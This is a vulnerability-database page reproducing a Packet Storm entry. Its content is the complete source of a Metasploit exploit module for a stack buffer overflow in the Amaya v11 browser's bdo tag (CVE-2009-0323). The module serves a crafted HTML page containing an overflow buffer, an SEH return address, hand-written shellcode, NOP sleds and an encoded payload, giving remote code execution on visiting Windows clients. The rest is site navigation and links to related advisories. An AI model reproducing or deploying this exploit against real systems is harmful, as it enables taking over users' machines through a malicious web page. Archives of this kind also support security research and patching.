Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormRob CarterPACKETSTORM:83102
HistoryNov 26, 2009 - 12:00 a.m.

Amaya Browser v11.0 bdo tag overflow

2009-11-2600:00:00
Rob Carter
packetstormsecurity.com
35

0.945 High

EPSS

Percentile

99.3%

JSON
`##  
# $Id: amaya_bdo.rb  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Amaya Browser v11.0 bdo tag overflow',  
'Description' => %q{  
This module exploits a stack overflow in the Amaya v11 Browser.  
By sending an overly long string to the "bdo"  
tag, an attacker may be able to execute arbitrary code.  
},  
'License' => MSF_LICENSE,  
'Author' => [ 'dookie, original exploit by Rob Carter' ],   
'Version' => '$Revision: 6812 $',  
'References' =>   
[  
[ 'CVE', '2009-0323' ],  
[ 'OSVDB', '55721' ],  
[ 'BID', '33046, 33047' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 970,  
'BadChars' => "\x00",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Amaya Browser v11', { 'Offset' => 6889, 'Ret' => 0x02101034 } ], # wxmsw28u_core_vc_custom.dll  
],  
'DisclosureDate' => 'Jan 28 2009',  
'DefaultTarget' => 0))  
end  
  
  
def on_request_uri(cli, request)  
# Re-generate the payload  
return if ((p = regenerate_payload(cli)) == nil)  
  
# Set the exploit buffer  
sploit = "<bdo dir=\""  
sploit += "\x41" * 6889  
sploit += "\x74\x06\x41\x41"  
sploit += [target.ret].pack('V')  
sploit += "\x68\x7f\x01\x01\x7f" # push 7F01017F  
sploit += "\x58" # pop EAX  
sploit += "\x2d\x18\x69\x45\x7d" # sub EAX, 7A7A0857  
sploit += "\x50" # push EAX  
sploit += "\xc3" # RETN  
sploit += make_nops(100)  
sploit += payload.encoded  
sploit += make_nops(970 - payload.encoded.length)  
sploit += "\">pwned!</bdo>"  
  
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")  
  
# Transmit the response to the client  
send_response_html(cli, sploit)  
  
# Handle the payload  
handler(cli)  
end  
  
end  
`

Related

coresecurity 1
checkpoint_advisories 1
freebsd 1
nvd 1
prion 1
cvelist 1
cve 1
ubuntucve 1
nessus 1
openvas 2
coresecurity
coresecurity
Amaya web editor XML and HTML parser vulnerabilities
2009-01-28 00:00:00
checkpoint_advisories
checkpoint_advisories
Amaya Browser BDO Tag Buffer Overflow (CVE-2009-0323)
2011-08-16 00:00:00
freebsd
freebsd
amaya -- multiple buffer overflow vulnerabilities
2008-11-25 00:00:00
nvd
nvd
CVE-2009-0323
2009-01-28 20:30:03
prion
prion
Stack overflow
2009-01-28 20:30:00
cvelist
cvelist
CVE-2009-0323
2009-01-28 20:00:00
cve
cve
CVE-2009-0323
2009-01-28 20:30:03
ubuntucve
ubuntucve
CVE-2009-0323
2009-01-28 00:00:00
nessus
nessus
FreeBSD : amaya -- multiple buffer overflow vulnerabilities (a89b76a7-f6bd-11dd-94d9-0030843d3802)
2011-10-14 00:00:00
openvas
openvas
FreeBSD Ports: amaya
2009-02-13 00:00:00
FreeBSD Ports: amaya
2009-02-13 00:00:00

0.945 High

EPSS

Percentile

99.3%

JSON
Related for PACKETSTORM:83102
coresecurity1checkpoint_advisories1freebsd1nvd1prion1cvelist1cve1ubuntucve1nessus1openvas2